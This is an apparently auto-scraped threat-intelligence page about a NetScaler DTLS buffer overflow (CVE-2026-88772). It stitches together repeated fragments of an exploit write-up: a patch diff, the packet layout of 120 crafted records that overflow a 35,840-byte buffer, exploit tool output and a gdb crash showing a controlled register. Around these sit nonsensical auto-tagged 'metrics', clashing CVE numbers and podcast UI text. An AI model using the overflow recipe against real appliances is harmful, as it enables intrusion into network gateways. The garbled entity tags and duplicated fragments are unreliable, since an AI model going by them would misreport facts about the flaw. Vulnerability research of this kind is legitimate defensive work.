The Citrix
advisory
recommends updating to the following fixed versions:
Metrics
infrastructure
73.30
Software Version
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
Metrics
infrastructure
73.37
Software Version
Vulnerable: NetScaler 14.1 build 73.30
Different
: NetScaler 14.1 build 73.37
Patch Diffing
Contrary to yesterday’s analysis, CVE-2026-88772 does live in
nsppe
, the all-being/all-knowing NetScaler binary.
Metrics
infrastructure
Cursor
Affected Product
The same fix is easier to see as C-like pseudocode:
--- nsppe-14.1-73.30 vulnerable
+++ nsppe-14.1-73.37 fixed
@@
copy_saved_header(scratch, saved_header, saved_header_length);
cursor = scratch + saved_header_length;
+space_left = 0x8c00 - saved_header_length;
for (nsb = fragment_chain; nsb !=
NULL; nsb = nsb->next) {
+ if (nsb->length > space_left) {
+ reject_message();
+ return;
+ }
memcpy(cursor, nsb->data, nsb->length);
cursor += nsb->length;
+ space_left -= nsb->length;
}
Step 1: Pass the DTLS Cookie Check
Metrics
data_breach
7
Bytes
[CVE-2026-88772]
[*] building payload for '/tmp/watchTowr'
[+] content size: 7 bytes
[*] connecting to DTLS gateway...
Metrics
data_breach
13
Byte
A single UDP packet can carry one or more DTLS records, and every record opens with a 13-byte header.
= 173652 bytes of NSB data
The function also copies a saved 13-byte DTLS record header:
total copied = 13 + 173652 = 173665 bytes
buffer size = 0x8c00 = 35840 bytes
overflow = 137825 bytes
That is 137,825 bytes spilling past the buffer and into whatever writable
nsppe
data happens to sit next to it.
Only the record sequence number and
fragment_offset
change:
13-byte DTLS record header
1,459-byte record body
├── 12-byte primary handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3…
Metrics
data_breach
12
Byte
When a record carries handshake data, that data begins with a further 12-byte header describing a handshake fragment:
0 1 2 3
0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
| Content Type | Version (DTLS)
The two 12-byte headers and their declared fragment sizes add up to the complete 1,459-byte body:
12 + 1 + 12 + 1434 = 1459
At the same time, the bytes actually placed in the packet also add up to 1,459:
12 + 120 + 12 + 1315 = 1459
Each of the other 119 NSBs contributes 1,447 bytes, because its 12-byte primary handshake header is skipped:
1459 + (119 * 1447)
Only the record sequence number and
fragment_offset
change:
13-byte DTLS record header
1,459-byte record body
├── 12-byte primary handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3…
Metrics
data_breach
1,447
Bytes
Each of the other 119 NSBs contributes 1,447 bytes, because its 12-byte primary handshake header is skipped:
1459 + (119 * 1447)
Metrics
data_breach
137,825
Bytes
= 173652 bytes of NSB data
The function also copies a saved 13-byte DTLS record header:
total copied = 13 + 173652 = 173665 bytes
buffer size = 0x8c00 = 35840 bytes
overflow = 137825 bytes
That is 137,825 bytes spilling past the buffer and into whatever writable
nsppe
data happens to sit next to it.
Metrics
financial
1
$ Rcx
(gdb) x/i $rip
=> 0x000000000143470e: mov %rax,0x20(%rcx)
(gdb) info registers rip rcx
rip 0x143470e 0x143470e
rcx 0x0000414141414141 71748523475265
(gdb) p/x $rcx + 0x20
$1 = 0x0000414141414161
As you can see we crash because the
RCX
register which we have control has an invalid address so when
RAX
is about to be written to
RCX + 0x20
segfault happen…
Metrics
data_breach
41
Mb Binary
No PIE (0x400000)
Since there is no PIE, we can use addresses in the 41 MB binary to our advantage (I genuinely do not know how to make this sentence funnier than it already is).
Metrics
data_breach
1,315
Remaining Bytes
…y handshake header
│ length = 120
│ message_seq = 2
│ fragment_offset = record number, from 0 to 119
│ fragment_length = 1
├── 120-byte primary area
├── 12-byte hidden handshake header
│ length = 1434
│ message_seq = 3
│ fragment_offset = 0
│ fragment_length = 1434
└── 1,315 remaining bytes
The unusual part is the first handshake header.
Metrics
data_breach
2
Record
Their offsets cover the whole message:
record 1 fragment_offset = 0
record 2 fragment_offset = 1
record 3 fragment_offset = 2
...
Metrics
infrastructure
3
Server
[+] association ready: 3 server datagrams
[*] sending 120 records (176640 bytes)...
Metrics
infrastructure
13.1-63
Software Version
The builds 14.1-73.32 and 13.1-63.21, which fixed the previously disclosed authentication-bypass vulnerability
CVE-2026-19490
, are still within the affected range for these new flaws.
Citrix has not said whether appliances on the August builds, 14.1-73.32 and 13.1-63.21, or any newer builds, are affected by the new flaws.
Intelligence Sources
Security Affairs
2026-09-27
Citrix Confirmed Two New NetScaler Flaws Exploited as Zero-Day
Security Affairs
The Hacker News
2026-09-27
The Hacker News
2026-09-30
SecurityWeek
2026-09-28
TheRecord
2026-09-28
Zero Day Fans
2026-09-29
Security Affairs
2026-10-09
The Hacker News
2026-10-09
Security Affairs
2026-10-05
Data Breaches
2026-10-01
Unpublish from Social Media?
Are you sure you want to delete this podcast video from all synchronized social networks (YouTube, Facebook, Threads)?
Important:
Due to Meta API restrictions, Instagram Reels cannot be deleted automatically via API by third-party apps.
View Profile to Delete Manually
View Profile to Delete Manually
Tactical Intelligence
Report Intelligence Issue
Podcast Options
Generate
Incident Version History
CURRENT VERSION
Last Updated: 2026-10-10T12:21
Comprehensive Tactical Telemetry
Highly Correlated Entities
79x
organisation
Identified Entity
Vulnerability / Network Security
Citrix
entity
34x
timeline
Temporal Reference
Oct 09, 2026
date
15x
infrastructure
Software Version
14.1-73
version
13x
vulnerability
Exploited CVE
CVE-2026-107406
cve
8x
attribution
Attributing Entity
CERT
authority
6x
data breach
Bytes
120
bytes
3x
vulnerability
CVSS Score
10
score
3x
infrastructure
Fips
14
fips
3x
data breach
Byte
1
byte
3x
general metric
Bits
48
bits
3x
general metric
Entities
6
entities
3x
target region
Target Country
United States
country
2x
tactic
Cyber Operation Type
Remote Code Execution
tactic
2x
general metric
Netscaler Adc
13
netscaler adc
2x
tactic
MITRE ATT&CK Technique
T1588.006 - Vulnerabilities
technique
2x
general metric
Sep
30
sep
2x
general metric
Offsets
0
offsets
2x
general metric
High
7
high
Contextual Telemetry
Context Block
26 METRICS
general metric
Oct
9
oct
general metric
Ndcpp
37
ndcpp
general metric
Netscaler
14
netscaler
financial
Netscaler
73
netscaler
general metric
Netscaler Gateway
73
netscaler gateway
financial
Netscaler Adc
14
netscaler adc
infrastructure
Netscaler Adc Fips
73
netscaler adc fips
general metric
Cve-2026
88,772
cve-2026
general metric
Netscaler Zero Days
2
netscaler zero days
infrastructure
Devices
50,000
devices
general metric
Vulnerability
10
vulnerability
general metric
Fragments
120
fragments
general metric
Kb
174
kb
general metric
Cvss
4
cvss
general metric
Critical
9
critical
general metric
Different
73
different
general metric
Diffing Contrary
73
diffing contrary
infrastructure
Affected Product
Cursor
software
general metric
Packet
1,459
packet
general metric
Other Nsbs
119
other nsbs
financial
$ Rcx
1
$ rcx
data breach
Mb Binary
41
mb binary
data breach
Remaining Bytes
1,315
remaining bytes
data breach
Record
2
record
general metric
Little
64
little
infrastructure
Server
3
server
Click on any entity below to view its context in the main text!
Selective Unpublish
Selecciona las redes de las que quieres eliminar esta publicación. El sistema intentará borrar el post real de la API y limpiará la base de datos para que puedas volver a lanzarlo.
By navigating this website, you accept the use of strictly necessary technical cookies for session security and basic platform functionality. We do not use tracking or advertising cookies.
Read our Privacy Policy.